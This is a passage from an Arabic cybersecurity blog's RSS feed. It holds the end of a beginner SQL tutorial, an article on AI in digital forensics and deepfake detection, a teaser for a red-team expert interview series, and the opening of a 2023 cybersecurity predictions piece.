&lt;p&gt;&lt;strong&gt;1- one-to-one:&lt;/strong&gt; هي علاقة واحد ل واحد أي أنه يسمح لسطر في جدول بالارتباط بسطر واحد من الجدول الآخر&lt;/p&gt;
&lt;p&gt;مثال: مدير الشركة يدير شركة واحدة&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2- one-to-many:&lt;/strong&gt; هي علاقة واحد ل كل أي يسمح لسطر معين بالارتباط بالعديد من الاسطر في الجداول الأخرى&lt;/p&gt;
&lt;p&gt;مثال: يمكن لشخص امتلاك اكثر من موبايل&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3- many-to-many:&lt;/strong&gt; علاقة كل ل كل يسمح لسطر من الجدول الأول الارتباط بالعديد من السطور في الجدول الآخر و يسمح لسطر من الجدول الثاني الارتباط بالعديد من السطور في الجدول الأول&lt;/p&gt;
&lt;p&gt;مثال: يمكن للطلاب أن يحضروا عند العديد من المدرسين ويمكن للمدرسين تعليم العديد من الطلاب&lt;/p&gt;
&lt;p&gt;مما سبق نرى أن العلاقات بين الجداول تجعل قاعدة البيانات واقعية اكثر ومترابطة.&lt;/p&gt;
&lt;h2 id=&quot;لغة-الاستعلام-sql&quot;&gt;لغة الاستعلام SQL&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;SQL – Structured Query Language:&lt;/strong&gt; هي لغة تستخدم للاستعلام و التحكم في قواعد البيانات تتميز بسرعة المعالجة البيانات وتعمل على العديد من المنصات وهي سهلة الكتابة والفهم و تنقسم أوامر اللغة الى أربعة أنواع هذه الأنواع عبارة عن مفاهيم وليست لغة خاصة داخل لغة الاستعلام, الأنواع: DDL وDQL وDML وDCL.&lt;/p&gt;
&lt;h2 id=&quot;التحكم-في-الجداول&quot;&gt;التحكم في الجداول&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;DDL – Data Definition Language:&lt;/strong&gt; هي مجموعة الأوامر المسؤولة عن إنشاء الجدول وحذفه والتعديل على الجدول كتعديل نوع العامود الخ..&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;بعض الأوامر الخاصة بهذا النوع:&lt;/strong&gt;&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;sql&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;CREATE&lt;/span&gt;&lt;span&gt; TABLE&lt;/span&gt;&lt;span&gt; name_table&lt;/span&gt;&lt;span&gt; (column1 data_type ,column2 datatype);&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;DROP&lt;/span&gt;&lt;span&gt; TABLE&lt;/span&gt;&lt;span&gt; name_table;&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;ALTER&lt;/span&gt;&lt;span&gt; TABLE&lt;/span&gt;&lt;span&gt; name_table &lt;/span&gt;&lt;span&gt;ADD&lt;/span&gt;&lt;span&gt; (newcolumn datatype);&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;أوامر DDL&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;1- الأمر رقم واحد هو أمر مسؤول عن إنشاء جدول ويأخذ اسم الجدول و اسم الأعمدة ولجانب كل عامود نوع البيانات الخاصة به&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ملاحظة:&lt;/strong&gt; يمكن لنوع البيانات أن يكون &lt;code&gt;int&lt;/code&gt; أو &lt;code&gt;char&lt;/code&gt; أو &lt;code&gt;varchar&lt;/code&gt; أو &lt;code&gt;text&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;2- الأمر رقم اثنين هو أمر يقوم بحذف الجدول و يأخذ اسم الجدول فقط&lt;/p&gt;
&lt;p&gt;3- الأمر رقم ثلاثة يقوم بالتعديل على الجدول ويضيف عامود إلى الجدول ويأخذ اسم الجدول واسم العامود الجديد و نوع البيانات&lt;/p&gt;
&lt;h2 id=&quot;التحكم-بالبيانات&quot;&gt;التحكم بالبيانات&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;DML – Data Manipulation Language:&lt;/strong&gt; هي مجموعة الأوامر التي تستخدم لادخال و التعديل على البيانات داخل الجدول&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;بعض الأوامر الخاصة بهذا النوع:&lt;/strong&gt;&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;sql&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;INSERT INTO&lt;/span&gt;&lt;span&gt; name_table (column1,column2,column3) &lt;/span&gt;&lt;span&gt;values&lt;/span&gt;&lt;span&gt;(value1,value2,value3);&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;UPDATE&lt;/span&gt;&lt;span&gt; name_table &lt;/span&gt;&lt;span&gt;SET&lt;/span&gt;&lt;span&gt; column1&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;new_value &lt;/span&gt;&lt;span&gt;WHERE&lt;/span&gt;&lt;span&gt; id&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;id_value;&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;DELETE&lt;/span&gt;&lt;span&gt; FROM&lt;/span&gt;&lt;span&gt; name_table &lt;/span&gt;&lt;span&gt;WHERE&lt;/span&gt;&lt;span&gt; id &lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;id_values;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;أوامر DML&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;1- الأمر رقم واحد مسؤول عن ادخال البيانات فهو يأخذ اسم الجدول و أسماء الأعمدة والقيم الخاصة بالاعمدة&lt;/p&gt;
&lt;p&gt;2- الامر رقم اثنين مسؤول عن تعديل البيانات ويأخذ اسم الجدول و العامود و القيمة الجديدة و يأخذ شرط لتحديد النموذج(سطر)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ملاحظة:&lt;/strong&gt; الأمر &lt;code&gt;WHERE&lt;/code&gt; مسؤول عن تحديد أي سطر سوف يعدل&lt;/p&gt;
&lt;p&gt;3- الامر رقم ثلاثة مسؤول عن الحذف ويأخذ اسم الجدول و الشرط لمعرفة النموذج المراد حذفه&lt;/p&gt;
&lt;h2 id=&quot;التحكم-بالاستعلام&quot;&gt;التحكم بالاستعلام&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;DQL – Data Query Language:&lt;/strong&gt; هي مجموعة الأوامر المسؤولة عن الاستعلام وجلب وفلترة البيانات والتلاعب بها و هو قسم مهم لانه مسؤول عن عرض البيانات&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;بعض الأوامر الخاصة بهذا النوع:&lt;/strong&gt;&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;sql&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;SELECT&lt;/span&gt;&lt;span&gt; *&lt;/span&gt;&lt;span&gt; FROM&lt;/span&gt;&lt;span&gt; name_table;&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;SELECT&lt;/span&gt;&lt;span&gt; *&lt;/span&gt;&lt;span&gt; FROM&lt;/span&gt;&lt;span&gt; name_table &lt;/span&gt;&lt;span&gt;WHERE&lt;/span&gt;&lt;span&gt; column&lt;/span&gt;&lt;span&gt;=value&lt;/span&gt;&lt;span&gt;;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;أوامر DQL&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;1- الامر الاول يعرض بيانات الجدول ياخذ اسم الجدول والأعمدة&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ملاحظة:&lt;/strong&gt; الإشارة &lt;code&gt;*&lt;/code&gt; تعرض جميع الاعمدة واذا أردت عرض عامود معين نضع اسمه مكان النجمة&lt;/p&gt;
&lt;p&gt;2- الامر رقم اثنين يعرض معلومات الجدول إذا تطابق مع الشرط الموضوع في نهاية الأمر&lt;/p&gt;
&lt;h2 id=&quot;التحكم-بالصلاحيات&quot;&gt;التحكم بالصلاحيات&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;DCL – Data Control Language:&lt;/strong&gt; هي الأوامر المسؤولة عن التحكم بقاعدة البيانات مثل الحفظ وإعطاء الصلاحيات&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;بعض الأوامر الخاصة بهذا النوع:&lt;/strong&gt;&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;sql&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;GRANT&lt;/span&gt;&lt;span&gt; SELECT&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;INSERT&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;UPDATE&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;DELETE&lt;/span&gt;&lt;span&gt; ON&lt;/span&gt;&lt;span&gt; name_table &lt;/span&gt;&lt;span&gt;TO&lt;/span&gt;&lt;span&gt; users;&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;REVOKE&lt;/span&gt;&lt;span&gt; SELECT&lt;/span&gt;&lt;span&gt; ON&lt;/span&gt;&lt;span&gt; name_table &lt;/span&gt;&lt;span&gt;FROM&lt;/span&gt;&lt;span&gt; user;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;أوامر DCL&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;1- الامر الأول مسؤول عن إعطاء صلاحيات للمستخدم ويأخذ الأوامر المسموحة واسم الجدول واسم المستخدم&lt;/p&gt;
&lt;p&gt;2- الأمر الثاني المسؤول عن سحب الصلاحيات ويأخذ الأوامر الغير مسموح بها و اسم الجدول واسم المستخدم&lt;/p&gt;
&lt;p&gt;باختصار, يمكن القول إن قواعد البيانات عنصر أساسي وحيوي في العالم التقني حيث توفر وسائل لاستخراج والتعديل على البيانات.&lt;/p&gt;
&lt;p&gt;وتوفر وسائل إدارة ممتازة للتحكم وتنظيم البيانات ومن المؤكد أن قواعد البيانات سوف تستمر في التطور و لن يتوقف استعمالها لهذا انصح بتعلمها.&lt;/p&gt;
</content:encoded><category>الشبكات</category><category>قواعد البيانات</category><category>SQL</category><category>DBMS</category><category>Primary Key</category><category>تطوير الويب</category></item><item><title>مستقبل التحقيق الجنائي الرقمي في ظل تطور تقنيات الذكاء الاصطناعي</title><link>https://blog.cyberpedia.site/digital-forensics-future/</link><guid isPermaLink="true">https://blog.cyberpedia.site/digital-forensics-future/</guid><description>ما هو التحقيق الجنائي الرقمي وكيف يجمع المحقق الأدلة ويحللها، وكيف يساعد الذكاء الاصطناعي في كشف فيديوهات deepfake، وأبرز تحديات المجال مستقبلًا.</description><pubDate>Mon, 15 May 2023 08:40:29 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;التحقيق الجنائي الرقمي هو استخدام الأدوات الرقمية لجمع الأدلة من الأجهزة والبريد والملفات وتحليلها لإثبات الجرائم الإلكترونية وتحديد المسؤولين عنها. يساعد الذكاء الاصطناعي المجال بتحليل البيانات أسرع وكشف فيديوهات deepfake عبر تحليل الوجوه والحركة وعيوب التلاعب، بينما يواجه المجال تحديات تضخم البيانات وسرعة الابتكار وتنوع الأجهزة.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;يعتبر التحقيق الجنائي الرقمي أحد أهم المجالات في عصرنا الحالي.&lt;/p&gt;
&lt;p&gt;إذ نعيش الآن في عصر تطور تكنولوجي مذهل حول العالم حيث أصبح هذا التطور ملحوظاً للجميع.&lt;/p&gt;
&lt;p&gt;كما نرى هذا التطور الرقمي في تفاصيلنا اليومية التي نعيشها.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;وبالتأكيد إن لهذا التطور السريع بعض الأوجه الخفية الخبيثة التي لا ترى بوضوح تام.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;بإختلاف أعمار وفئات مجتمعاتنا الحالية أصبحت لغات الأرقام متصدرة لجميع جوانب حياتنا رغم تعدد أوجهها وإستخداماتها.&lt;/p&gt;
&lt;p&gt;وبالتالي عملاً بمقولة الحاجة أم الإختراع أصبح مجال التحقيق الجنائي الرقمي أحد أهم مجالات عصرنا الرقمي الحديث.&lt;/p&gt;
&lt;p&gt;كما جاء الذكاء الإصطناعي مساعداً بل مكملاً لهذا المجال الرقمي الحديث.&lt;/p&gt;
&lt;p&gt;وعلى ما يبدو أن الذكاء الإصطناعي سوف يكون له حضوره المميز في مستقبل التحقيق الجنائي الرقمي.&lt;/p&gt;
&lt;p&gt;في مقالنا هذا ستتعرف على التحقيق الجنائي الرقمي وستقرر بنفسك&lt;/p&gt;
&lt;p&gt;ما إن كان الذكاء الإصطناعي &lt;em&gt;&lt;strong&gt;مساعداً&lt;/strong&gt;&lt;/em&gt; أم &lt;em&gt;&lt;strong&gt;مخرباً&lt;/strong&gt;&lt;/em&gt; لهذا المجال الأمني المهم&lt;/p&gt;
&lt;h2 id=&quot;التحقيق-الجنائي-الرقمي-وأهميته&quot;&gt;التحقيق الجنائي الرقمي وأهميته&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;أربع مراحل لعمل المحقق الجنائي الرقمي: جمع الأدلة، واسترداد البيانات، وترتيبها وتحليلها، وتحديد المسؤولين عن الجريمة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.CIUMd-pf_283h72.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;لك أن تتخيل أنه في كل يوم نعيشه تحدث حوالي 2244 هجمة سيبرانية في العالم.&lt;/p&gt;
&lt;p&gt;إذ توقع مكتب التحقيقات الفدرالي وفقاً لسجلات جرائم الإنترنت أن تبلغ تكلفة هذه الإنتهاكات &lt;a href=&quot;https://www.getastra.com/blog/security-audit/cyber-crime-statistics/&quot;&gt;8 تريليون دولار في عام 2023.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;وكان لابد للمسؤولين وصناع القرار إيجاد الحلول اللازمة والسريعة للتقليل من هذه الإنتهاكات ومحاربتها بكل الطرق المتاحة.&lt;/p&gt;
&lt;p&gt;حيث يعتبر التحقيق الجنائي الرقمي هو إستخدام الأدوات الرقمية والتكنولوجيا لجمع وتحليل ودراسة الأدلة الرقمية وإستخدامها في إثبات الجرائم الإلكترونية.&lt;/p&gt;
&lt;p&gt;ويشمل التحقيق الجنائي الرقمي جمع كافة الأدلة التي يمكن الإستفادة من معلوماتها وبياناتها مثل: أجهزة الكومبيوتر والهواتف المحمولة والبريد الإلكتروني وكافة الملفات الرقمية الأخرى.&lt;/p&gt;
&lt;p&gt;بالإضافة إلى ذلك يستخدم المحقق الرقمي تقنيات مخصصة مثل إسترداد البيانات والتحليل الرقمي لجمع الأدلة وتحليلها.&lt;/p&gt;
&lt;p&gt;حيث يهدف المحقق الجنائي الرقمي إلى جمع الأدلة وترتيبها وتحليلها لتأكيد أو نفي وجود الجريمة.&lt;/p&gt;
&lt;p&gt;بالإضافة إلى ذلك يستطيع المحقق بنفس التقنيات والأدلة تحديد المشتبه بهم والمسؤولين عنها.&lt;/p&gt;
&lt;h2 id=&quot;هل-سيتغير-مستقبل-التحقيق-الجنائي-الرقمي-في-ظل-تطور-الذكاء-الإصطناعي-&quot;&gt;هل سيتغير مستقبل التحقيق الجنائي الرقمي في ظل تطور الذكاء الإصطناعي ؟&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;أربع طرق يكشف بها الذكاء الاصطناعي فيديوهات deepfake: تحليل الوجوه، وحركة الجسم، وتحليل النمط العصبي، وعيوب التلاعب&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.Crr8grYd_180mG7.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;بجانب الخدمات الرفاهية التي يوفرها الذكاء الاصطناعي للعالم يلعب أيضا دورا هاما في خدمة التحقيق الجنائي الرقمي.&lt;/p&gt;
&lt;p&gt;حيث قدم الذكاء الإصطناعي الكثير من الخدمات المفيدة لهذا المجال.&lt;/p&gt;
&lt;p&gt;على سبيل المثال قدم الذكاء الإصطناعي &lt;a href=&quot;https://www.mdrscenter.com/%D8%AE%D9%88%D8%A7%D8%B1%D8%B2%D9%85%D9%8A%D8%A7%D8%AA-%D8%A7%D9%84%D8%AA%D8%B5%D9%86%D9%8A%D9%81-%D9%88%D8%A7%D9%84%D8%AA%D9%86%D8%A8%D8%A4/&quot;&gt;خوارزميات التصنيف&lt;/a&gt; و&lt;a href=&quot;https://www.mdrscenter.com/%D8%AE%D9%88%D8%A7%D8%B1%D8%B2%D9%85%D9%8A%D8%A7%D8%AA-%D8%A7%D9%84%D8%AA%D8%B5%D9%86%D9%8A%D9%81-%D9%88%D8%A7%D9%84%D8%AA%D9%86%D8%A8%D8%A4/&quot;&gt;خوارزميات التنبؤ&lt;/a&gt; والتي تستخدم في الوقت الحالي في مجال التحقيق الجنائي الرقمي.&lt;/p&gt;
&lt;p&gt;بعبارة أخرى فإن ما يميز الذكاء الإصطناعي في هذا المجال هو قدرته على تحليل وفهم البيانات الرقمية بشكل أسرع وأكثر فعالية.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;ولكن هل يمكن للتحقيق الجنائي الرقمي مجابهة واحدة من أكثر التقنيات الجديدة المثيرة للشبهة وهي تقنية ال deepfake ؟؟&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;تعرف هذه التقنية deepfake بأنها تطبيق من تطبيقات الذكاء الإصطناعي الحديث.&lt;/p&gt;
&lt;p&gt;إذ تكمن خطورة هذه التقنية في قدرتها على صنع فيديوهات وصور مزيفة عبر تقنيات رقمية متطورة.&lt;/p&gt;
&lt;p&gt;حيث تقوم هذه التقنية على محاولة دمج عدد من الصور ومقاطع الفيديو لشخصية ما من أجل إنتاج مقطع فيديو جديد.&lt;/p&gt;
&lt;p&gt;وقد يبدو للوهلة الأولى أنه حقيقي للغاية لكنه في واقع الأمر مزيف حيث تعرض هذه الفيديوهات أشياء غير حقيقية ولم تحصل إطلاقا بطريقة مقنعة غير قابلة للشك.&lt;/p&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/oxXpB9pSETo&quot; title=&quot;فيديو&quot; allowfullscreen=&quot;&quot; width=&quot;560&quot; height=&quot;315&quot;&gt;&lt;/iframe&gt;
&lt;p&gt;&lt;em&gt;هذا ليس الممثل الشهير مورغان فريمان إنها تقنية ال deepfake&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;ولكن رغم هذه القدرة على تزييف الحقائق إلا انه يمكن للذكاء الاصطناعي استخدام العديد من التقنيات لكشف الفروق بين مقاطع الفيديو الحقيقية وتلك التي تم إنشاؤها باستخدام تقنية deepfake.&lt;/p&gt;
&lt;p&gt;حيث لدى الذكاء الإصطناعي القدرة على تحليل الوجوه وحركات الفم والعينين وأيضاً الحركة العامة للجسم لتحديد ما إذا كان الشخص الموجود في الفيديو حقيقياً أم لا.&lt;/p&gt;
&lt;p&gt;وذلك عن طريق بعض التقنيات مثل تحليل البيانات العصبية إذ يمكن للذكاء الاصطناعي تحليل النمط العصبي في الصور والفيديوهات لتحديد ما إذا كانت تعاني من عمليات تلاعب.&lt;/p&gt;
&lt;p&gt;وأيضاً عن طريق بعض العيوب التي قد تتركها تقنية ال deepfake.&lt;/p&gt;
&lt;p&gt;على سبيل المثال يمكن أن تظهر بعض الخطوط غير الطبيعية أو الانحناءات في المناطق التي تم التلاعب بها إذ يمكن للذكاء الإصطناعي ملاحظة وكشف هذه العيوب.&lt;/p&gt;
&lt;h2 id=&quot;التحديات-و-التطورات-المستقبلية&quot;&gt;التحديات و التطورات المستقبلية&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;ثلاثة تحديات تواجه التحقيق الجنائي الرقمي: تضخم حجم البيانات، والابتكار التقني، وتنوع الأجهزة والتطبيقات&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.x4MdIrcE_10xx4D.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;في غضون التطور الهائل الذي يشهده العالم الرقمي وسرعة هذا التطور القياسية أيضاً.&lt;/p&gt;
&lt;p&gt;تزيد حجم المسؤوليات على عاتق مجال التحقيق الجنائي الرقمي إذ يواجه هذا المجال بعض التحديات التي لايمكن الإستهانة بها مثل تزايد حجم البيانات الرقمية الهائل.&lt;/p&gt;
&lt;p&gt;حيث أن هذا التضخم يجعل من الصعب على المحققين تجميع وتحليل هذه البيانات بشكل فعال وفي وقت قصير.&lt;/p&gt;
&lt;p&gt;والأهم من ذلك يواجه التحقيق الجنائي الرقمي تحدي الابتكار التقني حيث تشهد التكنولوجيا الرقمية تطوراً سريعاً يحتم على التحقيقات الجنائية الرقمية أن تبقى على إطلاع دائم على التطورات والإبتكارات التقنية الجديدة.&lt;/p&gt;
&lt;p&gt;في نفس السياق إن تنوع الأجهزة والتطبيقات الهائل يعتبر أيضاً تحدياً للتحقيق الجنائي الرقمي إذ يعتمد هذا المجال على الوصول إلى مختلف أنواع الأجهزة والتطبيقات الرقمية.&lt;/p&gt;
&lt;p&gt;وبالتالي إن التنوع الكبير لهذه الأجهزة والتطبيقات يزيد من صعوبة المهمة على عاتق المحققين الجنائيين الرقميين.&lt;/p&gt;
&lt;h2 id=&quot;التحقيق-الجنائي-الرقمي-أساس-تحقيق-العدالة-في-العصر-الرقمي&quot;&gt;التحقيق الجنائي الرقمي أساس تحقيق العدالة في العصر الرقمي&lt;/h2&gt;
&lt;p&gt;يواجه مجال التحقيق الجنائي الرقمي تحديات متعددة ومتنوعة فقد تطورت طرق إرتكاب الجرائم لتشمل التهديدات الإلكترونية المتقدمة التي تهدد الأفراد والمؤسسات على حد سواء.&lt;/p&gt;
&lt;p&gt;رغم التحديات التي يواجهها وتزايد صعوبتها بإستمرار إلا أن الذكاء الإصطناعي يمكن ان يكون حليفاً قوياً لهذا المجال.&lt;/p&gt;
&lt;p&gt;ولذلك فإن للذكاء الإصطناعي دور حاسم في إستمرارية هذا المجال ونجاحه.&lt;/p&gt;
&lt;p&gt;بالإضافة إلى ذلك على التحقيق الجنائي الرقمي تحقيق التوازن بين استخدام الذكاء الاصطناعي والإبداع البشري.&lt;/p&gt;
&lt;p&gt;نتمنى أن نكون قد حققنا لكم أكبر استفادة.&lt;/p&gt;
&lt;p&gt;مع تحيات فريق عمل &lt;a href=&quot;https://blog.cyberpedia.site/&quot;&gt;تريند تك&lt;/a&gt;&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>التحقيق الجنائي الرقمي</category><category>الذكاء الاصطناعي</category><category>Deepfake</category><category>الجرائم الإلكترونية</category></item><item><title>قبيلة الهاكر: الفريق الأحمر</title><link>https://blog.cyberpedia.site/tripe-of-hacker-red-team/</link><guid isPermaLink="true">https://blog.cyberpedia.site/tripe-of-hacker-red-team/</guid><description>سلسلة قبيلة الهاكر تجمع إجابات خبراء الاختراق في الفريق الأحمر على أكثر من عشرين سؤالاً عن بدايتهم في الأمن السيبراني الهجومي وكيف حققوا النجاح.</description><pubDate>Tue, 07 Mar 2023 10:08:54 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;قبيلة الهاكر سلسلة طُرح فيها أكثر من عشرين سؤالاً على خبراء في الأمن السيبراني حول بدايتهم وطريقهم إلى النجاح. يضم هذا الجزء إجابات خبراء الاختراق العاملين في الحماية الهجومية Offensive Security، أي الفريق الأحمر Red Teaming.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;في هذه السلسلة الممتعة جداً سألنا عدد من الخبراء في مجال الأمن السيبراني أكثر من عشرين سؤال حول كيفية بدايتهم في هذا المجال وكيف حققوا النجاح وسنشارك معكم إجابات مجموعة من خبراء الاختراق العاملين في مجال الحماية الهجومية Offensive Security أو ما يعرف باسم الفريق الأحمر Red Teaming.&lt;/p&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>الفريق الأحمر</category><category>Red Team</category><category>اختبار الاختراق</category><category>المسار المهني</category><category>Offensive Security</category></item><item><title>توقعات الأمن السيبراني لعام 2023</title><link>https://blog.cyberpedia.site/cybersecurity-predictions-2023/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cybersecurity-predictions-2023/</guid><description>أبرز توقعات الأمن السيبراني لعام 2023: الثقة الصفرية وبرمجيات الفدية واختراق تقنيات الفضاء والعملات المشفرة و5G وواجهات API ولينكس والهجمات الحكومية.</description><pubDate>Wed, 04 Jan 2023 08:45:13 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;تتوقع المقالة لعام 2023 اعتماداً متزايداً لمبدأ الثقة الصفرية، وازدياد هجمات الفدية المخصصة، واحتمال اختراق تقنيات الفضاء وحدث كبير في العملات المشفرة، إلى جانب تزايد تهديدات شبكات 5G وواجهات API والهجمات على لينكس والهجمات التي ترعاها الدول، مع غرامات أكبر على تسريب البيانات.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;التنبؤ بالمستقبل في مجال &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt; يعتمد على الحقائق الموجودة لدينا، بالنسبة للقارئ العادي قد يبدو التنبؤ بمستقبل الأمن السيبراني للعام المقبل بمثابة عمل تخميني أو تكهنات ولكن بالنسبة لنا نحن العاملين في مجال الأمن السيبراني فإن هذا التوقع الاستباقي لما قد يخطط له الأشرار ومجرمي الانترنت يعتبر أمر ضروري ولا بده منه.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;القاعدة العامة في التنبؤ هي&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;كلما كان المصدر أكثر موثوقية كلما كان التنبؤ أكثر دقة&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;مع الاستفادة من سنوات الخبرة العديدة المكتسبة من العمل مع شركات متعددة تقدم خدمات الأمن السيبراني، هناك إشارات لا حصر لها استخدمتها للتنبؤ بدقة بما سيحدث على مدار العام الجديد&lt;/p&gt;
&lt;h2 id=&quot;إليك-تنبؤات-الأمن-السيبراني-التي-قد-نواجهها-في-عام-2023&quot;&gt;إليك تنبؤات الأمن السيبراني التي قد نواجهها في عام 2023&lt;/h2&gt;
&lt;h3 id=&quot;اعتماد-مبدأ-الثقة-الصفرية&quot;&gt;اعتماد مبدأ الثقة الصفرية&lt;/h3&gt;
&lt;p&gt;تشير العديد من المصادر إلى أن العديد من الصناعات لا تزال لا تعتمد على مبدأ الثقة الصفرية Zero Trust في الأمن السيبراني.&lt;/p&gt;
&lt;p&gt;تتبنى المنصات والأدوات الأمنية الحديثة وعلى نطاق واسع التكامل مع هذا المبدأ وفي الحقيقة يبدو أن هذا الأمر هو مسألة ثقافية وتعليمية وستشهد اعتماداً متزايداً في العام المقبل ومن ناحية أخرى فإن هذا المبدأ ليس “الرصاصة الفضية” للأمن السيبراني فهو جزء من العديد من القواعد والمبادئ الأساسية في هذا المجال.&lt;/p&gt;
&lt;h3 id=&quot;ازدياد-عدد-هجمات-برمجيات-الفدية&quot;&gt;ازدياد عدد هجمات برمجيات الفدية&lt;/h3&gt;
&lt;p&gt;تصدرت هجمات برامج الفدية عناوين نشرات الأخبار في الأعوام السابقة وقد تطورت الأساليب المستخدمة في هذه الهجمات وأصبحت أكثر تعقيداً.&lt;/p&gt;
&lt;p&gt;شهدنا في العام الماضي زيادة في التقارير التي تشير إلى إطلاق برامج الفدية المخصصة ضد شركات أو منظمات محددة والتي لا يمكنها تحمل الانقطاع الطويل لخدماتها ولهذا السبب يجب على كل الشركات والمنظمات التأكد من أنها محمية بشكل كامل من خلال تطبيق الأمور التالية:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;تأمين وحماية بيئة العمل&lt;/li&gt;
&lt;li&gt;وضع خطة للاستجابة للحوادث والتعافي منها&lt;/li&gt;
&lt;li&gt;وضع خطة لضمان استمرارية الحماية والامتثال&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;ويجب أن يشمل هذا الأمر على وجود أكثر من نسخة احتياطية للبيانات والتأكيد على حفظها بمكان آمن مع ضمان سرعة استعادتها عند الحاجة لها.&lt;/p&gt;
&lt;h3 id=&quot;اختراق-التكنولوجيا-الفضائية&quot;&gt;اختراق التكنولوجيا الفضائية&lt;/h3&gt;
&lt;p&gt;هناك احتمال أن يكون في هذا العام نوع من عمليات الاختراق الكبيرة في تكنولوجيا الفضاء ضد قمر صناعي أو مركز إطلاق أو الشبكات أو الاتصالات الخاصة بهذه التقنية.&lt;/p&gt;
&lt;p&gt;بعبارة أخرى ستتخذ عمليات الاختراق أفق جديد من خلال الانفصال عن الأرض والتأثير بشكل سلبي على تكنولوجيا الأقمار الصناعية أو حتى الطائرات.&lt;/p&gt;
&lt;h3 id=&quot;حدث-كبير-على-مستوى-العملات-الرقمية-المشفرة&quot;&gt;حدث كبير على مستوى العملات الرقمية المشفرة&lt;/h3&gt;
&lt;p&gt;على الرغم من كل الفرص المالية التي وعد بها المستثمرون بالعملات الرقمية والتي كانوا يطمحون إلى إنشائها ولكن هذا الأمر لم يكتمل وقد تعرضت سمعة العملات الرقمية للعديد من الأحداث السلبية فقد انتشرت قصص الرعب حول حوادث تبادل العملات المشفرة في الصحافة، على سبيل المثال لقد خسرت منصة Binance 100 مليون دولار في هجوم إلكتروني مباشر وتم اختراق الرموز الخاصة بها.&lt;/p&gt;
